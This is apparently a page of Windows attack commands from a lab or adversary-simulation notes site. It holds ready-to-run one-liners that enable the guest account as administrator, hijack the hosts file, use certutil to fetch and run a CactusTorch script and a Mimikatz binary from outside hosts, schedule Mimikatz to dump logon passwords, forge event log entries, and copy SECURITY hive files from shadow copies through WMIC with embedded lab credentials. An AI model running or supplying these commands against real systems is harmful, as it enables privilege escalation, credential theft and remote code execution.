Windows Commands

Enable Guest Administrator

net user guest /active:yes

net localgroup administrators guest /ADD

Modify hosts file

ECHO 127.0.0.1 facebook.com >> %SYSTEMROOT%\System32\drivers\etc\hosts

Run CactusTorch bin shell

cmd.exe /c certutil.exe -urlcache -split -f https://raw.githubusercontent.com/NextronSystems/APTSimulator/master/download/cactus.js C:\Users\Public\en-US.js

C:\Users\Public\en-US.js start /B cmd /c wscript.exe C:\Users\Public\en-US.js

Fake Eventlog password dump entries

eventcreate /L System /T Success /ID 100 /D "A service was installed in the system. Service Name:  WCESERVICE Service File Name:  C:\Users\Administrator\AppData\Local\Temp\0c134c70-2b4d-4cb3-beed-37c5fa0451d0.exe -S Service Type:  user mode service Service Start Type:  demand start Service Account:  LocalSystem"

eventcreate /L System /T Success /ID 101 /D "The WCESERVICE service entered the running state."

Schedule Mimikatz

cmd.exe /c certutil.exe -urlcache -split -f http://vmoshpit.com/tools/mim.exe C:\Exeptions\eeee.exe

schtasks /create /f /sc minute /mo 5 /tn Backup /tr "C:\Exeptions\eeee.exe sekurlsa::LogonPasswords > C:\TMP\eeee.txt"

Steal Credentials

cmd.exe /C wmic /node:"172.16.245.128" /user:"vmoshpit.lab\Administrator" /password:"root00--" process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\ProgramData\nt & copy \GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SECURITY C:\ProgramData\nt"

cmd.exe /C type \\172.16.245.128\c$\log.txt

cmd.exe /C wmic /node:"172.16.245.128"  /user:"vmoshpit.lab\Administrator" /password:"root00--" process call create "cmd /c vssadmin list shadows >> c:\log.txt"

cmd.exe /C wmic /node:"172.16.245.128"  /user:"vmoshpit.lab\Administrator" /password:"root00--" process call create "cmd /c vssadmin create shadow /for=C 2>&1"

PreviousLinux Basics NextDarknet